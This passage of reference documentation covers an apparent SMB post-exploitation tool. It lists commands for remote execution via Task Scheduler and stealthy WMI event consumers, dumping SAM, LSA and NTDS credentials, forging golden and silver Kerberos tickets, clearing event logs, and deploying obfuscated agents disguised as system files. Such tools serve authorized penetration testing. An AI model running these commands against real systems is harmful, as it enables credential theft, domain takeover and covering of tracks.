Description: Display network interfaces on the remote server
Help:
usage: ifconfig [-h]
Display network interfaces on the remote server
Example Usage:
Example Usage: ifconfig
hostname
Description: Display the hostname of the remote server
Help:
usage: hostname [-h]
Display the hostname of the remote server
Example Usage:
Example Usage: hostname
procs
Description: List running processes on the remote server
Help:
usage: procs [-h] [-v] [-t]
List running processes on the remote server
Example Usage:
Example Usage: procs -t -v
ps
Description: List running processes on the remote server
Help:
usage: procs [-h] [-v] [-t]
List running processes on the remote server
Example Usage:
Example Usage: procs -t -v
tasklist
Description: List running processes on the remote server
Help:
usage: procs [-h] [-v] [-t]
List running processes on the remote server
Example Usage:
Example Usage: procs -t -v
fwrules
Description: Display firewall rules on the remote server
Help:
usage: fwrules [-h]
Display firewall rules on the remote server
Example Usage:
Example Usage: fwrules
set
Description: Set a variable for use in the application
Help:
usage: set [-h] varname [value]
Set a variable for use in the application
Example Usage:
Example Usage: set varname value
Arguments
-
varname: Set the debug variable to True or False- Required: Yes
-
value: Set the mode variable to True or False- Default: ``
- Required: No
config
Description: Show the current config
Help:
usage: config [-h]
Show the current config
Example Usage:
Example Usage: config
run
Description: Run a slinger script or command sequence
Help:
usage: run [-h] (-c CMD_CHAIN | -f FILE)
Run a slinger script or command sequence
Example Usage:
Example Usage: run -c "use C$;cd Users;cd Administrator;cd Downloads;ls"
Arguments
-
cmd_chain: Specify a command sequence to run- Required: No
-
file: Specify a script file to run- Required: No
secretsdump
Description: Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Help:
usage: secretsdump [-h] [--sam] [--lsa] [--ntds] [--just-dc-ntlm] [--history]
[-o OUTPUT] [--tmp-path PATH]
Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Example Usage:
Examples:
secretsdump # Dump SAM + LSA (default)
secretsdump --sam # SAM hashes only
secretsdump --lsa # LSA secrets only (cached creds, service passwords)
secretsdump --ntds # NTDS.dit via DRS replication (DC only)
secretsdump --ntds --just-dc-ntlm # NTDS NTLM hashes only (faster)
secretsdump --history # Include password history
secretsdump -o /tmp/hashes.txt # Save output to file
hashdump # Alias for secretsdump --sam
Arguments
-
output: Save extracted secrets to file- Required: No
-
tmp_path: Absolute disk path for temporary hive files (default: auto per share). Must be writable by SYSTEM and accessible from the connected share- Required: No
hashdump
Description: Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Help:
usage: secretsdump [-h] [--sam] [--lsa] [--ntds] [--just-dc-ntlm] [--history]
[-o OUTPUT] [--tmp-path PATH]
Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Example Usage:
Examples:
secretsdump # Dump SAM + LSA (default)
secretsdump --sam # SAM hashes only
secretsdump --lsa # LSA secrets only (cached creds, service passwords)
secretsdump --ntds # NTDS.dit via DRS replication (DC only)
secretsdump --ntds --just-dc-ntlm # NTDS NTLM hashes only (faster)
secretsdump --history # Include password history
secretsdump -o /tmp/hashes.txt # Save output to file
hashdump # Alias for secretsdump --sam
Arguments
-
output: Save extracted secrets to file- Required: No
-
tmp_path: Absolute disk path for temporary hive files (default: auto per share). Must be writable by SYSTEM and accessible from the connected share- Required: No
spnenum
Description: Query SPNs from the domain for Kerberoasting / silver ticket targets
Help:
usage: spnenum [-h] --method {atexec,wmiexec} [--query QUERY] [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
Query SPNs from the domain for Kerberoasting / silver ticket targets
Example Usage:
Examples:
spnenum --method atexec # List all SPNs via Task Scheduler
spnenum --method atexec --query "*/FOREST" # SPNs matching pattern
spnenum --method wmiexec # List all SPNs via WMI DCOM
spnenum --method atexec --query "MSSQLSvc/*" # Find SQL Server SPNs
Methods:
atexec - Runs 'setspn -Q' as SYSTEM via Task Scheduler. Requires share connection.
wmiexec - Runs 'setspn -Q' as SYSTEM via WMI DCOM. Requires DCOM ports.
Note: Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
-
method: Enumeration method: atexec (Task Scheduler) or wmiexec (WMI DCOM)- Choices: atexec, wmiexec
- Required: Yes
-
query: SPN query pattern (default: / for all SPNs)- Default:
*/* - Required: No
- Default:
-
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\ - Required: No
- Default:
-
sn: Filename for command output (default: random)- Required: No
-
tn: Scheduled task name (default: auto-generated)- Required: No
-
ta: Task author for OPSEC (default: Slinger)- Default:
Slinger - Required: No
- Default:
-
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task - Required: No
- Default:
-
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows - Required: No
- Default:
-
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
ticket
Description: Forge Kerberos tickets using extracted hashes. Golden tickets use the krbtgt hash (full domain access). Silver tickets use a service account hash (access to specific service).
Help:
usage: ticket [-h] {golden,silver} ...
Forge Kerberos tickets using extracted hashes. Golden tickets use the krbtgt hash (full domain access). Silver tickets use a service account hash (access to specific service).
Example Usage:
Examples:
ticket golden --nthash <krbtgt_hash> # Golden ticket as Administrator
ticket golden --nthash <hash> --user svc_admin --user-id 1001
ticket golden --aesKey <aes256_key> --domain htb.local
ticket silver --nthash <machine_hash> --spn cifs/dc01.htb.local
ticket silver --nthash <hash> --spn http/web01.htb.local --user admin
Note: Domain SID auto-fetched via SAMR if not provided.
Requires krbtgt hash (golden) or service account hash (silver) from secretsdump --ntds.
Subcommands
ticket golden
Description: Forge a TGT using the krbtgt NTLM hash or AES key. Grants full domain access as any user.
Help:
usage: ticket golden [-h] [--nthash NTHASH] [--aesKey AESKEY]
[--domain DOMAIN] [--domain-sid DOMAIN_SID] [--user USER]
[--user-id USER_ID] [--groups GROUPS]
[--extra-sid EXTRA_SID] [--duration DURATION] [-o OUTPUT]
Forge a TGT using the krbtgt NTLM hash or AES key. Grants full domain access as any user.
Example Usage:
Examples:
ticket golden --nthash <krbtgt_hash>
ticket golden --nthash <hash> --user svc_admin --user-id 1001
ticket golden --aesKey <aes256> --groups "513, 512, 520, 518, 519"
ticket golden --nthash <hash> --extra-sid S-1-5-21-...-519 -o admin.ccache
Arguments
nthash: krbtgt NTLM hash for ticket signingaesKey: krbtgt AES key (128 or 256 bit) for ticket signingdomain: Domain FQDN (default: session domain)domain_sid: Domain SID (auto-fetched if not provided)user: User to impersonate (default: Administrator)- Default:
Administrator
- Default:
user_id: User RID (default: 500)- Default:
500
- Default:
groups: Group RIDs (default: Domain Users, Domain Admins, etc.)- Default:
513, 512, 520, 518, 519
- Default:
extra_sid: Extra SID to add to ticket (for cross-domain)duration: Ticket duration in hours (default: 87600 = 10 years)- Default:
87600
- Default:
output: Output ccache file path (default: ~/.slinger/.ccache) - Required: No
ticket silver
Description: Forge a TGS for a specific service using the service account's NTLM hash or AES key.
Help:
usage: ticket silver [-h] [--nthash NTHASH] [--aesKey AESKEY] --spn SPN
[--domain DOMAIN] [--domain-sid DOMAIN_SID] [--user USER]
[--user-id USER_ID] [-o OUTPUT]
Forge a TGS for a specific service using the service account's NTLM hash or AES key.
Example Usage:
Examples:
ticket silver --nthash <machine_hash> --spn cifs/dc01.htb.local
ticket silver --nthash <hash> --spn http/web01.htb.local --user admin
ticket silver --aesKey <aes256> --spn ldap/dc01.htb.local
Arguments
nthash: Service account NTLM hash for ticket signingaesKey: Service account AES key (128 or 256 bit)spn: Target SPN (e.g., cifs/dc01.domain.com)domain: Domain FQDN (default: session domain)domain_sid: Domain SID (auto-fetched if not provided)user: User to impersonate (default: Administrator)- Default:
Administrator
- Default:
user_id: User RID (default: 500)- Default:
500
- Default:
output: Output ccache file path (default: ~/.slinger/.ccache) - Required: No
env
Description: Display environment variables on the remote server
Help:
usage: env [-h]
Display environment variables on the remote server
Example Usage:
Example Usage: env
debug-availcounters
Description: Display available performance counters on the remote server. This is for debug use only, it doesn't really give you anything.
Help:
usage: debug-availcounters [-h] [-f FILTER] [-p] [-s filename]
Display available performance counters on the remote server. This is for debug use only, it doesn't really give you anything.
Example Usage:
Example Usage: availcounters
Arguments
-
filter: Simple filter for case insenstive counters containing a given string- Required: No
-
save: Save the available counters to a file- Required: No
debug-counter
Description: Display a performance counter on the remote server. This is for debug use only, it doesn't really give you anything.
Help:
usage: debug-counter [-h] [-c COUNTER] [-a {x86,x64,unk}] [-i]
Display a performance counter on the remote server. This is for debug use only, it doesn't really give you anything.
Example Usage:
Example Usage: counter -c 123 [-a x86]
Arguments
-
counter: Specify the counter to display- Required: No
-
arch: Specify the architecture of the remote server- Choices: x86, x64, unk
- Default:
unk - Required: No
network
Description: Display network information on the remote server
Help:
usage: network [-h] [--tcp] [--rdp]
Display network information on the remote server
Example Usage:
Example Usage: network
atexec
Description: Execute a command on the remote server
Help:
usage: atexec [-h] -c COMMAND [--sp SP] [--sn SN] [--tn TN] [--ta TA]
[--td TD] [--tf TF] [--no-output] [-i] [-w WAIT]
Execute a command on the remote server
Example Usage:
Example Usage: atexec -tn "NetSvc" -sp \\Users\\Public\\Downloads\\ -c ipconfig
For multi-word commands: atexec -c "echo hello world" -tn MyTask
Note: Output is saved to a temp file on target and retrieved via SMB.
--sp should be reachable from the connected share (auto-adjusted per share type).
Arguments
-
command: Specify the command to execute. For commands with spaces, wrap in quotes (e.g., 'echo hello world')- Required: Yes
-
sp: Folder to save output file (default: auto per share, e.g., \Temp\ on ADMIN$)- Default:
\Users\Public\Downloads\ - Required: No
- Default:
-
sn: Specify the name of the output file. Default is <random 8-10 chars>.txt- Required: No
-
tn: Specify the name of the scheduled task (default: auto-generated)- Required: No
-
ta: Specify the author of the scheduled task- Default:
Slinger - Required: No
- Default:
-
td: Specify the description of the scheduled task- Default:
Scheduled task created by Slinger - Required: No
- Default:
-
tf: Specify the folder to run the task in- Default:
\Windows - Required: No
- Default:
-
wait: Seconds to wait for the task to complete- Default:
1 - Required: No
- Default:
reload
Description: Reload the current sessions context
Help:
usage: reload [-h]
Reload the current sessions context
Example Usage:
Example Usage: reload
plugins
Description: List available plugins
Help:
usage: plugins [-h]
List available plugins
Example Usage:
Example Usage: plugins
changes
Description: Display audit trail of all write operations this session
Help:
usage: changes [-h] [--category {FILE,SERVICE,TASK,REGISTRY,AGENT,EXEC}]
[--save] [--clear]
Display audit trail of all write operations this session
Example Usage:
Example Usage: changes | changes --category FILE | changes --save
Arguments
category: Filter by change category- Choices: FILE, SERVICE, TASK, REGISTRY, AGENT, EXEC
- Required: No
downloads
Description: Manage resume download states and cleanup
Help:
usage: downloads [-h] {list,cleanup} ...
Manage resume download states and cleanup
Example Usage:
Example Usage: downloads list
Subcommands
downloads list
Description: Display all active resumable downloads with progress
Help:
usage: downloads list [-h]
Display all active resumable downloads with progress
- Required: No
downloads cleanup
Description: Remove completed, stale, or corrupted download state files
Help:
usage: downloads cleanup [-h] [--max-age MAX_AGE] [--force]
Remove completed, stale, or corrupted download state files
Arguments
max_age: Remove state files older than N days- Default:
7 - Required: No
- Default:
eventlog
Description: Query Windows Event Logs via RPC over SMB named pipe \pipe\eventlog
Help:
usage: eventlog [-h] {query,list,check,clear,status} ...
Query Windows Event Logs via RPC over SMB named pipe \pipe\eventlog
Example Usage:
Examples:
eventlog status # Check if eventlog pipe exists
eventlog list --method rpc # List available event logs
eventlog check --method rpc --log System # Check if a log exists
eventlog query --method rpc --log System --last 30 --limit 10 # Query via RPC
eventlog query --method atexec --log System --limit 10 # Query via Task Scheduler
eventlog query --method rpc --log System --format json -o events.json # Export to JSON
eventlog clear --method atexec --log Application --force # Clear via Task Scheduler
eventlog clear --method wmiexec --log System --force # Clear via WMI DCOM
Subcommands
eventlog query
Description: Query Windows Event Log entries with filtering and export
Help:
usage: eventlog query [-h] --method {rpc,atexec,wmiexec} --log LOG [--id ID]
[--type {error,warning,information,success,failure}]
[--since SINCE] [--last MINUTES] [--limit LIMIT]
[--source SOURCE] [--find FIND]
[--format {table,json,list,csv}] [-o OUTPUT] [--verbose]
[--order {newest,oldest}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
Query Windows Event Log entries with filtering and export
Example Usage:
Examples:
eventlog query --method rpc --log System --last 30 --limit 10
eventlog query --method rpc --log Application --level error --limit 20
eventlog query --method rpc --log Security --find 'failed logon' --limit 20
eventlog query --method rpc --log System --format json -o events.json
eventlog query --method rpc --log System --format csv -o events.csv
eventlog query --method atexec --log Security --limit 50
eventlog query --method wmiexec --log System --limit 10
Methods:
rpc - Query via \pipe\eventlog RPC (default, fastest)
atexec - Query via 'wevtutil qe' as SYSTEM through Task Scheduler
wmiexec - Query via 'wevtutil qe' as SYSTEM through WMI DCOM
Arguments
method: Query method: rpc (\pipe\eventlog), atexec (Task Scheduler), or wmiexec (WMI DCOM)- Choices: rpc, atexec, wmiexec
log: Event log name (System, Application, Security, etc.)id: Specific event ID to filterlevel: Event level to filter- Choices: error, warning, information, success, failure
since: Events since date (YYYY-MM-DD or 'YYYY-MM-DD HH:MM:SS')last: Events from the last X minuteslimit: Maximum number of events to return- Default:
10
- Default:
source: Filter by event source namefind: Search for string in event contentformat: Output format (default: list)- Choices: table, json, list, csv
- Default:
list
output: Save output to fileorder: Order events by newest first (default) or oldest first- Choices: newest, oldest
- Default:
newest
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
eventlog list
Description: List all available event logs on the remote system
Help:
usage: eventlog list [-h] --method {rpc,atexec,wmiexec} [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
List all available event logs on the remote system
Example Usage:
Examples:
eventlog list --method rpc # List via RPC pipe
eventlog list --method atexec # List via Task Scheduler (wevtutil)
eventlog list --method wmiexec # List via WMI DCOM (wevtutil)
Arguments
method: Method: rpc (\pipe\eventlog), atexec (Task Scheduler), or wmiexec (WMI DCOM)- Choices: rpc, atexec, wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
eventlog check
Description: Check if a specific Windows Event Log exists and is accessible
Help:
usage: eventlog check [-h] --method {rpc,atexec,wmiexec} --log LOG [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
Check if a specific Windows Event Log exists and is accessible
Example Usage:
Examples:
eventlog check --method rpc --log System # Check via RPC pipe
eventlog check --method atexec --log Security # Check via Task Scheduler (wevtutil)
eventlog check --method wmiexec --log Application # Check via WMI DCOM (wevtutil)
Arguments
method: Method: rpc (\pipe\eventlog), atexec (Task Scheduler), or wmiexec (WMI DCOM)- Choices: rpc, atexec, wmiexec
log: Event log name to check (can include custom paths)sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
eventlog clear
Description: Clear all events from a Windows Event Log (cannot be undone)
Help:
usage: eventlog clear [-h] --log LOG --method {rpc,atexec,wmiexec} [--force]
[--sp PATH] [--sn NAME] [--tn NAME] [--ta AUTHOR]
[--td DESC] [--tf FOLDER] [-w SECS]
Clear all events from a Windows Event Log (cannot be undone)
Example Usage:
Examples:
eventlog clear --log System --method atexec --force # wevtutil as SYSTEM via Task Scheduler
eventlog clear --log Application --method wmiexec --force # wevtutil as SYSTEM via WMI DCOM
eventlog clear --log Security --method rpc --force # RPC via \pipe\eventlog (needs elevated privs)
Methods:
rpc - Direct RPC via \pipe\eventlog. Requires SE_SECURITY_PRIVILEGE (fails with UAC filtering)
atexec - Runs 'wevtutil cl' as SYSTEM via Task Scheduler. Requires share connection. Leaves Event ID 1102
wmiexec - Runs 'wevtutil cl' as SYSTEM via WMI DCOM. Requires DCOM ports (135+dynamic). Leaves Event ID 1102
Note: atexec/wmiexec save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
log: Event log name to clearmethod: Clearing method: rpc, atexec (Task Scheduler), or wmiexec (WMI DCOM)- Choices: rpc, atexec, wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
eventlog status
Description: Check IPC$ pipes for eventlog service availability
Help:
usage: eventlog status [-h]
Check IPC$ pipes for eventlog service availability
Example Usage:
Examples:
eventlog status # Check if \pipe\eventlog exists in IPC$
- Required: No
wmiexec
Description: Execute commands on the remote system using various WMI execution methods. Each method has different capabilities, stealth levels, and requirements.
Help:
usage: wmiexec [-h] [--endpoint-info] METHOD ...
Execute commands on the remote system using various WMI execution methods. Each method has different capabilities, stealth levels, and requirements.
Example Usage:
Available Methods:
dcom - Traditional Win32_Process.Create via DCOM
event - WMI Event Consumer (stealthy)
query - Execute WQL queries
Example Usage:
wmiexec dcom 'systeminfo' # Traditional DCOM
wmiexec event 'net user' --trigger-delay 5 # Event consumer
wmiexec query 'SELECT * FROM Win32_Process' # WQL query
Subcommands
wmiexec dcom
Description: Execute commands using traditional WMI Win32_Process.Create method via DCOM. Requires DCOM connectivity (ports 135 + dynamic range). May be blocked by firewalls.
Help:
usage: wmiexec dcom [-h] [-c COMMAND] [-i] [--timeout TIMEOUT]
[--output filename] [--no-output]
[--sleep-time SLEEP_TIME] [--sp PATH] [--sn NAME]
[--raw-command] [--shell {cmd,powershell}]
Execute commands using traditional WMI Win32_Process.Create method via DCOM. Requires DCOM connectivity (ports 135 + dynamic range). May be blocked by firewalls.
Example Usage:
Command Wrappers:
DEFAULT: cmd.exe /Q /c "command" # Standard Windows command
execution
--raw-command: command # No wrapper, execute directly
--shell powershell: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -NonInteractive -NoLogo -Command "command"
Raw Command Usage:
Use --raw-command when you want to execute commands WITHOUT the cmd.exe wrapper:
Standard (with cmd.exe wrapper):
wmiexec dcom -c "whoami" # Executes: cmd.exe /Q /c whoami
wmiexec dcom -c "dir C:\" # Executes: cmd.exe /Q /c dir C:
Raw (no wrapper):
wmiexec dcom -c "whoami" --raw-command # Executes: whoami (directly)
wmiexec dcom -c "calc.exe" --raw-command # Executes: calc.exe (directly)
Output control:
wmiexec dcom -c "whoami" --no-output # Execute without capturing output
wmiexec dcom -c "whoami" --sp "C:\Users\Public" # Custom save path for output file
wmiexec dcom -c "whoami" --sn myoutput.txt # Custom output filename
Interactive Mode:
wmiexec dcom -i # Start interactive DCOM shell
wmiexec dcom -i --output session.txt # Save session log to local file
wmiexec dcom -i --sp "C:\Users\Public" --sn out.txt # Custom remote output path/name per command
wmiexec dcom -i --shell powershell # Interactive PowerShell shell
Note: WMI working directory syncs with SMB 'cd'. Use 'cd' to change directory before running commands.
Output is saved to a temp file on target and retrieved via SMB.
--sp must be a path reachable from the connected share (e.g., \Temp\ on ADMIN$).
Arguments
command: Command to execute (not required for --interactive mode)timeout: Command execution timeout in seconds- Default:
30
- Default:
output: Save command output to local filesleep_time: Sleep time before capturing output in seconds- Default:
1.0
- Default:
save_path: Directory on target to save output file (default: auto per share). Should be reachable from the connected sharesave_name: Custom filename for remote output capture (default: auto-generated)shell: Shell to use for command execution- Choices: cmd, powershell
- Default:
cmd - Required: No
wmiexec event
Description: Execute commands using WMI Event Consumers (highest stealth method).
Examples:
Basic usage
wmiexec event "whoami"
Raw command mode (direct CommandLineTemplate)
wmiexec event "calc.exe" --raw-command # ExecutablePath: cmd.exe wmiexec event "whoami" --raw-exec "" # ExecutablePath: None (blank) wmiexec event "Get-Process" --raw-exec "powershell.exe" # ExecutablePath: powershell.exe
Custom artifacts for stealth
wmiexec event "whoami" --exe pwsh --cname "UpdateConsumer" --fname "MaintenanceFilter"
--script-name "check_system" --upload-path "C:\Windows\System32\check_system.ps1"
-o "C:\Windows\Logs\system_check.log" --trigger-exe "svchost.exe"
With local save
wmiexec event "systeminfo" -o "C:\temp\info.txt" --save "./sysinfo.txt"
Help:
usage: wmiexec event [-h] [--consumer-name CONSUMER_NAME]
[--filter-name FILTER_NAME]
[--trigger-delay TRIGGER_DELAY] [--no-cleanup]
[--timeout TIMEOUT] [--no-output] [--save filename]
[--working-dir WORKING_DIR] [--shell {cmd,powershell}]
[--exe {cmd,pwsh}] [--trigger-exe TRIGGER_EXE]
[-t TRIGGER] [-l] [-i] [--system]
[--upload-path UPLOAD_PATH] [--script-name SCRIPT_NAME]
[-o OUTPUT] [--raw-command] [--raw-exec RAW_EXEC]
[command]
Execute commands using WMI Event Consumers (highest stealth method).
Examples:
# Basic usage
wmiexec event "whoami"
# Raw command mode (direct CommandLineTemplate)
wmiexec event "calc.exe" --raw-command # ExecutablePath: cmd.exe
wmiexec event "whoami" --raw-exec "" # ExecutablePath: None (blank)
wmiexec event "Get-Process" --raw-exec "powershell.exe" # ExecutablePath: powershell.exe
# Custom artifacts for stealth
wmiexec event "whoami" --exe pwsh --cname "UpdateConsumer" --fname "MaintenanceFilter" \
--script-name "check_system" --upload-path "C:\Windows\System32\check_system.ps1" \
-o "C:\Windows\Logs\system_check.log" --trigger-exe "svchost.exe"
# With local save
wmiexec event "systeminfo" -o "C:\temp\info.txt" --save "./sysinfo.txt"
Arguments
command: Command to execute (not required for --interactive mode)consumer_name: Name for CommandLineEventConsumer (default: auto-generated)filter_name: Name for __EventFilter (default: auto-generated)trigger_delay: Seconds to wait before triggering event- Default:
5
- Default:
timeout: Total execution timeout in seconds- Default:
30
- Default:
save: Save command output to local fileworking_dir: Working directory for command execution- Default:
C:\
- Default:
shell: Shell to use for command execution- Choices: cmd, powershell
- Default:
cmd
exe: Execution type: 'cmd' (uploads .bat file) or 'pwsh' (uploads .ps1 file)- Choices: cmd, pwsh
- Default:
cmd
trigger_exe: Executable to trigger the Event Filter (default: notepad.exe). Will be automatically spawned after consumer creation.- Default:
notepad.exe
- Default:
trigger: Only trigger an existing Event Consumer (no creation). Specify executable to spawn.upload_path: Custom script upload path on target (default: C:\Windows\Temp\RANDOM_NAME.ext where ext is .bat for cmd or .ps1 for pwsh)script_name: Custom script filename (without extension, will be auto-appended based on --exe type). If not specified, completely random name is generated.output: Custom remote output file path for capturing command results (default: C:\Windows\Temp\out_RANDOM.tmp). Supports CMS notation.raw_exec: Put the entire command directly into CommandLineTemplate. ExecutablePath is set to the provided string value.- Required: No
wmiexec query
Description: Execute WMI Query Language (WQL) queries against the remote system. Supports interactive mode, class description, and multiple output formats.
Help:
usage: wmiexec query [-h] [--namespace NAMESPACE]
[--format {list,table,json,csv}] [-o FILE]
[--timeout SECONDS]
[--interactive | --describe CLASS | --list-classes |
--template TEMPLATE | --list-templates | query]
Execute WMI Query Language (WQL) queries against the remote system. Supports interactive mode, class description, and multiple output formats.
Example Usage:
Query Examples:
wmiexec query "SELECT * FROM Win32_Process"
wmiexec query "SELECT Name, ProcessId FROM Win32_Process WHERE Name = 'notepad.exe'"
wmiexec query "SELECT * FROM Win32_Service WHERE State = 'Running'"
wmiexec query --describe Win32_Process
wmiexec query --interactive
wmiexec query --template processes --timeout 300
wmiexec query "SELECT * FROM Win32_UserAccount" --format json -o users.json
wmiexec query --template processes --format table
Arguments
query: WQL query string to execute (e.g., 'SELECT * FROM Win32_Process')describe: Describe WMI class schema (e.g., --describe Win32_Process)template: Execute predefined query template (use --list-templates to see available)namespace: WMI namespace to query (default: root/cimv2)- Default:
root/cimv2
- Default:
format: Output format for query results (default: list)- Choices: list, table, json, csv
- Default:
list
output: Save query results to filetimeout: Query timeout in seconds (default: 120)- Default:
120 - Required: No
- Default:
agent
Description: Build polymorphic C++ agents for named pipe command execution
Help:
usage: agent [-h]
{build,info,deploy,list,rename,check,use,start,kill,rm,reset,update} ...
Build polymorphic C++ agents for named pipe command execution
Example Usage:
Example Usage: agent build --arch x64 | agent deploy ./agent.exe --path temp\\ --name myagent --start
Subcommands
agent build
Description: Build C++ agents with advanced obfuscation and polymorphic encryption
Help:
usage: agent build [-h] [--arch {x86,x64,both}] [--encryption]
[--no-encryption] [--debug] [--output-dir OUTPUT_DIR]
[--dry-run] [--pipe PIPE] [--name NAME] [--pass PASSPHRASE]
[--obfuscate] [--upx PATH]
Build C++ agents with advanced obfuscation and polymorphic encryption
Example Usage:
Examples:
agent build # Build both x86 and x64 agents with defaults
agent build --arch x64 # Build only x64 agent
agent build --pipe myagent # Use custom pipe name "myagent"
agent build --name slinger # Output as slinger_x64.exe/slinger_x86.exe
agent build --pass MySecretPass123 # Enable HMAC-SHA256 authentication
agent build --obfuscate # Strip symbols and anti-debug
agent build --obfuscate --upx upx # Obfuscate and pack with UPX
agent build --arch x64 --pipe agent1 --pass P@ss --obfuscate # Full production build
agent build --dry-run # Check build prerequisites without building
agent build --debug # Enable debug logging in agent binary
Arguments
arch: Target architecture for agent build- Choices: x86, x64, both
- Default:
both
output_dir: Custom output directory for built agentspipe: Specify custom pipe name for the agent (default: slinger)- Default:
slinger
- Default:
name: Specify custom name for the output binary filepassphrase: Passphrase for agent authentication (HMAC-SHA256 with PBKDF2)upx: Pack Windows PE binary with UPX after building (e.g., --upx /usr/bin/upx or --upx upx for system PATH)- Required: No
agent info
Description: Display configuration and capabilities of the agent builder
Help:
usage: agent info [-h]
Display configuration and capabilities of the agent builder
- Required: No
agent deploy
Description: Upload and execute polymorphic agent on target system via SMB
Help:
usage: agent deploy [-h] --path PATH --name NAME [--start]
[--method {wmiexec,atexec}] [--pipe PIPE] [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
agent_path
Upload and execute polymorphic agent on target system via SMB
Example Usage:
Examples:
agent deploy ./agent.exe --path temp\ --name myagent # Upload only (no start)
agent deploy ./agent.exe --path temp\ --name myagent --start # Deploy and start with wmiexec (default)
agent deploy ./agent.exe --path temp\ --name myagent --start --method atexec # Deploy and start with Task Scheduler
agent deploy ./agent.exe --path temp\ --name myagent --start --method atexec --ta "SYSTEM" --td "Update Service"
Note: --method, --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Arguments
agent_path: Path to the agent executable to deploypath: Target path relative to current share (e.g., temp, Windows\Temp)name: Name for deployed agent on target (e.g., updater, winlogon)method: Execution method to start agent (default: wmiexec). Only used with --start- Choices: wmiexec, atexec
- Default:
wmiexec
pipe: Specify pipe name for the agent (must match build-time pipe name)sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share- Default:
\Users\Public\Downloads\
- Default:
sn: Filename for command output (default: random)tn: Scheduled task name (default: auto-generated)ta: Task author for OPSEC (default: Slinger)- Default:
Slinger
- Default:
td: Task description for OPSEC (default: Slinger Task)- Default:
Slinger Task
- Default:
tf: Task Scheduler folder (default: \Windows)- Default:
\Windows
- Default:
wait: Seconds to wait for task completion (default: 2)- Default:
2 - Required: No
- Default:
agent list
Description: Show all deployed agents and their status
Help:
usage: agent list [-h] [--host HOST] [--del DELETE_AGENT]
[-f {table,list,json}]
Show all deployed agents and their status
Example Usage:
Example: agent list -f json
Arguments
host: Filter agents by hostdelete_agent: Remove agent from registry by ID (use 'all' to remove all agents)format: Output format (default: table)- Choices: table, list, json
- Default:
table - Required: No
agent rename
Description: Change the ID of a deployed agent in the registry
Help:
usage: agent rename [-h] --old OLD --new NEW
Change the ID of a deployed agent in the registry
Example Usage:
Example: agent rename --old slinger_abc123 --new my_agent
Arguments
old: Current agent IDnew: New agent ID- Required: Yes
agent check
Description: Verify if the agent process is still running via WMI query
Help:
usage: agent check [-h] agent_id
Verify if the agent process is still running via WMI query
Example Usage:
Example: agent check slinger_abc123
Arguments
agent_id: Agent ID to check- Required: Yes
agent use
Description: Connect to and interact with a deployed agent via named pipe.
ENCRYPTION & SESSION SECURITY: Agents built with --pass use AES-256-GCM encryption with HMAC-SHA256 authentication. Each session uses unique encryption keys:
- Agent generates random 16-byte nonce when you connect
- Client proves knowledge of passphrase via HMAC-SHA256 challenge-response
- Both derive session key using PBKDF2-HMAC-SHA256(passphrase_hash, nonce, 10k iterations)
- All commands in the session are encrypted with AES-256-GCM using this key
